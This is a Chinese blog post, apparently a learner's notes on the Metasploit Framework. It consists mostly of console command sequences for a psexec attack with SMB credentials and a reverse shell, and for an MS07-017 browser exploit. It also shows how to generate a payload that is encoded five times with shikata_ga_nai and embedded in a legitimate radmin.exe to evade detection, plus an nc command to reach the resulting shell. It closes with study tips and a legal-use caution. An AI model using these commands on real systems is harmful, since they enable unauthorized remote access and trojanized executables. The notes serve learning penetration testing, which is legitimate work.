msf学习笔记(2)

exploit分类

Active exploit

示例:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.1.100
rhost => 192.168.1.100
msf exploit(psexec) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(psexec) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > set smbuser user1 #需要客户机账户名
smbuser => user1
msf exploit(psexec) > set smbpass pass1 #需要客户机密码
smbpass => pass1
msf exploit(psexec) > exploit

Passive exploit

示例:

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize      ##引导点击网址漏洞
msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.1.100
srvhost => 192.168.1.100
msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(ms07_017_ani_loadimage_chunksize) > set lport 4444
lport => 4444
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit 

生成payload

msf payload(shell_bind_tcp) > generate  #生成payload(RB语言)
msf payload(shell_bind_tcp) > generate -b '\x00'        #过滤坏字符(编码方式)
msf > show encoders     #显示编码方式
msf payload(shell_bind_tcp) > generate -e php/base64        #手动指定编码方式

payload示例

msf payload(shell_bind_tcp) > generate -b  'x00' -t exe  -e x86/shikata_ga_nai -i 5 -k -x /user/share/windows-binaries/radmin.exe -f  /root/1.exe
#-b 排除坏字符
#-t 生成文件类型
#-e 使用编码方式
#-i 编码次数
#-k 隐蔽运营
#-x 使用正常文件模板(正常运行程序)
#-f 输出文件

控制机

nc 192.168.1.100 4444

NOP(字节滑动)
no-operation / Next Operation(无任何操作)

generate -s 14  #插入14个NOP
generate -t c   #C语言格式
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值